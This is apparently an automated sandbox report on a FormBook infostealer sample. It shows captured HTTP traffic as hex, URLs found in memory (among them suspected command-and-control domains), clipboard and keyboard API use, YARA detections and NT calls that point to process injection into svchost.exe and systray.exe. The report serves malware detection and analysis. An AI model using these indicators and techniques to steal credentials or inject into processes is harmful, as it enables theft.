64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 34 30 34 22 3e 0d 0a 09 09 09 09 3c 68 31 3e 34 30 34 3c 2f 68 31 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 68 32 3e 4f 6f 70 73 2c 20 54 68 65 20 50 61 67 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 63 61 6e 27 74 20 62 65 20 66 6f 75 6e 64 21 3c 2f 68 32 3e 0d 0a 09 09 09 3c 66 6f 72 6d 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 73 65 61 72 63 68 22 3e 0d 0a 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 53 65 61 72 63 68 2e 2e 2e 22 3e 0d 0a 09 09 09 09 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 3e 53 65 61 72 63 68 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 09 09 09 3c 2f 66 6f 72 6d 3e 0d 0a 09 09 09 3c 61 20 68 72 65 66 3d 22 2f 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 61 72 72 6f 77 22 3e 3c 2f 73 70 61 6e 3e 47 6f 20 42 61 63 6b 3c 2f 61 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Poppins:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/404.css" /></
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 18 Feb 2025 17:36:58 GMTServer: ApacheContent-Length: 815Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 50 6f 70 70 69 6e 73 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 34 30 34 2e 63 73 73 22 20 2f 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 09 3c 64 69 76 20 69 64 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 34 30 34 22 3e 0d 0a 09 09 09 09 3c 68 31 3e 34 30 34 3c 2f 68 31 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 68 32 3e 4f 6f 70 73 2c 20 54 68 65 20 50 61 67 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 63 61 6e 27 74 20 62 65 20 66 6f 75 6e 64 21 3c 2f 68 32 3e 0d 0a 09 09 09 3c 66 6f 72 6d 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 73 65 61 72 63 68 22 3e 0d 0a 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 53 65 61 72 63 68 2e 2e 2e 22 3e 0d 0a 09 09 09 09 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 3e 53 65 61 72 63 68 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 09 09 09 3c 2f 66 6f 72 6d 3e 0d 0a 09 09 09 3c 61 20 68 72 65 66 3d 22 2f 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 61 72 72 6f 77 22 3e 3c 2f 73 70 61 6e 3e 47 6f 20 42 61 63 6b 3c 2f 61 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Poppins:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 18 Feb 2025 17:38:07 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dSB9NmLxEbRclXaCuzfUvxkjw4yYTeGYEt63v1Aqt3CM8noDyHRdmgek6Qmcn5fmasR%2FSC8oakc4N7%2BHO2jD8MgdkDi%2F9GuVqWtwREvaASV2NTrGlmcIyA5sPAgJBD6%2F4fPhZYDyAj3iokVASw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 913fc9fd9819e972-DFWContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=37167&min_rtt=37167&rtt_var=18583&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=736&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 66 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f 41 4b c4 30 14 84 ef f9 15 cf 3d e9 c1 bc 6e a9 e0 e1 11 70 b7 5d 5c a8 6b d1 f6 e0 31 6b de 92 42 6d 6a 92 b6 f8 ef a5 5d 04 af 33 df 0c 33 74 93 bf ee eb 8f aa 80 e7 fa a5 84 aa d9 95 c7 3d 6c ee 11 8f 45 7d 40 cc eb fc ea a4 32 41 2c 4e 1b 25 c8 c6 af 4e 91 65 6d 94 a0 d8 c6 8e 55 96 64 70 72 11 0e 6e ec 0d e1 55 14 84 2b 44 67 67 7e 96 dc 56 fd 63 ec 56 09 1a 54 6d 19 3c 7f 8f 1c 22 1b 68 de 4a 98 75 80 de 45 b8 2c 1c b8 1e a2 6d 03 04 f6 13 7b 49 38 2c 4d 5e 09 d2 c6 78 0e 41 3d 0d fa d3 32 a6 32 93 0f 29 dc 36 e7 b1 8f e3 1d bc af 01 d0 11 e6 79 96 da 4c dc c7 d1 b3 e7 41 b7 3e cd 64 d7 4e 0c 95 f3 11 1e 13 c2 bf 32 41 b8 ae 25 5c 5f fe 02 00 00 ff ff e3 02 00 24 e8 d3 ed 20 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: f5LAK0=np]\k1kBmj]33t=lE}@2A,N%NemUdprnU+Dgg~VcVTm<"hJuE,m{I8,M^xA=22)6yLA>dN2A%\_$ 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 18 Feb 2025 17:38:10 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2B2SUIApopiJ9gcbRBvHWx4LwdBpwdhwNOtdv2UfMJ8GgA5%2F1wGqMRyFl4PVlq4ZVQMmAQrBkyTO8raPUrOp7vY5dVh3CYpBSxNJqpLY7gCSNNkaQVBiB3oQqbIOhufBxgrRU5zn5ONac4OBAwQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 913fca0d6d8c485b-DFWContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=39528&min_rtt=39528&rtt_var=19764&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=756&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 66 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f 41 4b c4 30 14 84 ef f9 15 cf 3d e9 c1 bc 6e a9 e0 e1 11 70 b7 5d 5c a8 6b d1 f6 e0 31 6b de 92 42 6d 6a 92 b6 f8 ef a5 5d 04 af 33 df 0c 33 74 93 bf ee eb 8f aa 80 e7 fa a5 84 aa d9 95 c7 3d 6c ee 11 8f 45 7d 40 cc eb fc ea a4 32 41 2c 4e 1b 25 c8 c6 af 4e 91 65 6d 94 a0 d8 c6 8e 55 96 64 70 72 11 0e 6e ec 0d e1 55 14 84 2b 44 67 67 7e 96 dc 56 fd 63 ec 56 09 1a 54 6d 19 3c 7f 8f 1c 22 1b 68 de 4a 98 75 80 de 45 b8 2c 1c b8 1e a2 6d 03 04 f6 13 7b 49 38 2c 4d 5e 09 d2 c6 78 0e 41 3d 0d fa d3 32 a6 32 93 0f 29 dc 36 e7 b1 8f e3 1d bc af 01 d0 11 e6 79 96 da 4c dc c7 d1 b3 e7 41 b7 3e cd 64 d7 4e 0c 95 f3 11 1e 13 c2 bf 32 41 b8 ae 25 5c 5f fe 02 00 00 ff ff e3 02 00 24 e8 d3 ed 20 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: f5LAK0=np]\k1kBmj]33t=lE}@2A,N%NemUdprnU+Dgg~VcVTm<"hJuE,m{I8,M^xA=22)6yLA>dN2A%\_$ 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 18 Feb 2025 17:38:13 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=su%2BanSNzTSADljP7h30z7V%2BzVHLQzFzRnuA02MEjGPMMIXDR86xS1Ddldra9E5IYHTLBKN2QIucFdS8KiebGXIEQTYetlx%2F05g4lUU8mxnGhdR831Sy8XJ6Aj69zzu2NCZ86FJcKyEWklGL1Ng%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 913fca1e1c13459a-LHRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=71490&min_rtt=71490&rtt_var=35745&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1773&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 65 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f 41 4b c4 30 14 84 ef f9 15 cf 3d e9 c1 bc 6e a9 e0 e1 11 70 b7 5d 5c a8 6b d1 f6 e0 31 6b de 92 42 6d 6a 92 b6 f8 ef a5 5d 04 af 33 df 0c 33 74 93 bf ee eb 8f aa 80 e7 fa a5 84 aa d9 95 c7 3d 6c ee 11 8f 45 7d 40 cc eb fc ea a4 32 41 2c 4e 1b 25 c8 c6 af 4e 91 65 6d 94 a0 d8 c6 8e 55 96 64 70 72 11 0e 6e ec 0d e1 55 14 84 2b 44 67 67 7e 96 dc 56 fd 63 ec 56 09 1a 54 6d 19 3c 7f 8f 1c 22 1b 68 de 4a 98 75 80 de 45 b8 2c 1c b8 1e a2 6d 03 04 f6 13 7b 49 38 2c 4d 5e 09 d2 c6 78 0e 41 3d 0d fa d3 32 a6 32 93 0f 29 dc 36 e7 b1 8f e3 1d bc af 01 d0 11 e6 79 96 da 4c dc c7 d1 b3 e7 41 b7 3e cd 64 d7 4e 0c 95 f3 11 1e 13 c2 bf 32 41 b8 ae 25 5c 5f fe 02 00 00 ff ff 0d 0a 62 0d 0a e3 02 00 24 e8 d3 ed 20 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: eaLAK0=np]\k1kBmj]33t=lE}@2A,N%NemUdprnU+Dgg~VcVTm<"hJuE,m{I8,M^xA=22)6yLA>dN2A%\_b$ 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 18 Feb 2025 17:38:15 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=z7OHNDzIczQdyOzdZkUhTVAiC3g4KKx0H8SHacIjPVgSNWk4UtrxSgAZ1%2FO1%2BAZygFaLwJIZwZcgXbf4V0WhwySXH2h2zFPi2AexYRrW46idouvWj8I%2BHEDSYWn2miYbxos4L11otutIltO8nQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 913fca2dffc076e5-SEAalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=66892&min_rtt=66892&rtt_var=33446&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=455&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 32 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 61 64 76 65 6e 74 75 72 65 72 65 70 61 69 72 32 34 2e 6c 69 76 65 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 120<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.52 (Ubuntu) Server at www.adventurerepair24.live Port 80</address></body></html>0

Source: systray.exe, 00000004.00000002.4012982747.000000000580E000.00000004.10000000.00040000.00000000.sdmp, n4776Jcum1G.exe, 00000006.00000002.4011202328.000000000369E000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=404refer
Source: n4776Jcum1G.exe, 00000006.00000002.4013593379.0000000004F7E000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.birbacher.online
Source: n4776Jcum1G.exe, 00000006.00000002.4013593379.0000000004F7E000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.birbacher.online/ihyj/
Source: systray.exe, 00000004.00000003.1885592121.00000000076CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: systray.exe, 00000004.00000003.1885592121.00000000076CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: systray.exe, 00000004.00000003.1885592121.00000000076CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: systray.exe, 00000004.00000003.1885592121.00000000076CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: systray.exe, 00000004.00000002.4012982747.00000000054EA000.00000004.10000000.00040000.00000000.sdmp, n4776Jcum1G.exe, 00000006.00000002.4011202328.000000000337A000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://dnlaunch.com/?domain=spinco.news
Source: systray.exe, 00000004.00000003.1885592121.00000000076CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: systray.exe, 00000004.00000003.1885592121.00000000076CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: systray.exe, 00000004.00000003.1885592121.00000000076CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: systray.exe, 00000004.00000002.4012982747.0000000005B32000.00000004.10000000.00040000.00000000.sdmp, n4776Jcum1G.exe, 00000006.00000002.4011202328.00000000039C2000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://fonts.googleapis.com/css?family=Poppins:400
Source: systray.exe, 00000004.00000002.4009177930.00000000028D2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: systray.exe, 00000004.00000002.4009177930.00000000028D2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: systray.exe, 00000004.00000003.1880034523.00000000076A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
Source: systray.exe, 00000004.00000002.4009177930.00000000028D2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2LMEM
Source: systray.exe, 00000004.00000002.4009177930.00000000028D2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: systray.exe, 00000004.00000002.4009177930.00000000028D2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033LMEM
Source: systray.exe, 00000004.00000002.4009177930.00000000028D2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
Source: systray.exe, 00000004.00000002.4009177930.00000000028D2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: systray.exe, 00000004.00000002.4009177930.00000000028D2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: systray.exe, 00000004.00000002.4012982747.0000000005E56000.00000004.10000000.00040000.00000000.sdmp, n4776Jcum1G.exe, 00000006.00000002.4011202328.0000000003CE6000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://urlsc.trafficmanager.net/?hh=
Source: systray.exe, 00000004.00000003.1885592121.00000000076CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: systray.exe, 00000004.00000003.1885592121.00000000076CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

Source: C:\Users\user\Desktop\ZmK1CAc4VP.exe

Code function: 0_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_0045A10F

Source: C:\Users\user\Desktop\ZmK1CAc4VP.exe

Code function: 0_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_0045A10F

Source: C:\Users\user\Desktop\ZmK1CAc4VP.exe

Code function: 0_2_0046DC80 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,

0_2_0046DC80

Source: C:\Users\user\Desktop\ZmK1CAc4VP.exe

Code function: 0_2_0044C37A GetKeyboardState,SetKeyboardState,PostMessageW,PostMessageW,SendInput,

0_2_0044C37A

Source: C:\Users\user\Desktop\ZmK1CAc4VP.exe

Code function: 0_2_0047C81C SendMessageW,DefDlgProcW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,GetWindowLongW,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

0_2_0047C81C

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.1686918719.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4009083957.0000000002830000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4010478338.0000000004240000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1687746502.0000000003750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1688926331.00000000063F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.4013593379.0000000004F10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4008861086.0000000002370000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4010273460.0000000002570000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0042C993 NtClose,	2_2_0042C993
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472B60 NtClose,LdrInitializeThunk,	2_2_03472B60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472DF0 NtQuerySystemInformation,LdrInitializeThunk,	2_2_03472DF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472C70 NtFreeVirtualMemory,LdrInitializeThunk,	2_2_03472C70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034735C0 NtCreateMutant,LdrInitializeThunk,	2_2_034735C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03474340 NtSetContextThread,	2_2_03474340
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03474650 NtSuspendThread,	2_2_03474650
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472BE0 NtQueryValueKey,	2_2_03472BE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472BF0 NtAllocateVirtualMemory,	2_2_03472BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472B80 NtQueryInformationFile,	2_2_03472B80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472BA0 NtEnumerateValueKey,	2_2_03472BA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472AD0 NtReadFile,	2_2_03472AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472AF0 NtWriteFile,	2_2_03472AF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472AB0 NtWaitForSingleObject,	2_2_03472AB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472F60 NtCreateProcessEx,	2_2_03472F60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472F30 NtCreateSection,	2_2_03472F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472FE0 NtCreateFile,	2_2_03472FE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472F90 NtProtectVirtualMemory,	2_2_03472F90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472FA0 NtQuerySection,	2_2_03472FA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472FB0 NtResumeThread,	2_2_03472FB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472E30 NtWriteVirtualMemory,	2_2_03472E30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472EE0 NtQueueApcThread,	2_2_03472EE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472E80 NtReadVirtualMemory,	2_2_03472E80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472EA0 NtAdjustPrivilegesToken,	2_2_03472EA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472D00 NtSetInformationFile,	2_2_03472D00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472D10 NtMapViewOfSection,	2_2_03472D10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472D30 NtUnmapViewOfSection,	2_2_03472D30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472DD0 NtDelayExecution,	2_2_03472DD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472DB0 NtEnumerateKey,	2_2_03472DB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472C60 NtCreateKey,	2_2_03472C60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472C00 NtQueryInformationProcess,	2_2_03472C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472CC0 NtQueryVirtualMemory,	2_2_03472CC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472CF0 NtOpenProcess,	2_2_03472CF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472CA0 NtQueryInformationToken,	2_2_03472CA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03473010 NtOpenDirectoryObject,	2_2_03473010
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03473090 NtSetValueKey,	2_2_03473090
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034739B0 NtGetContextThread,	2_2_034739B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03473D70 NtOpenThread,	2_2_03473D70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03473D10 NtOpenProcessToken,	2_2_03473D10
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4_2_04694650 NtSuspendThread,LdrInitializeThunk,	4_2_04694650
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4_2_04694340 NtSetContextThread,LdrInitializeThunk,	4_2_04694340
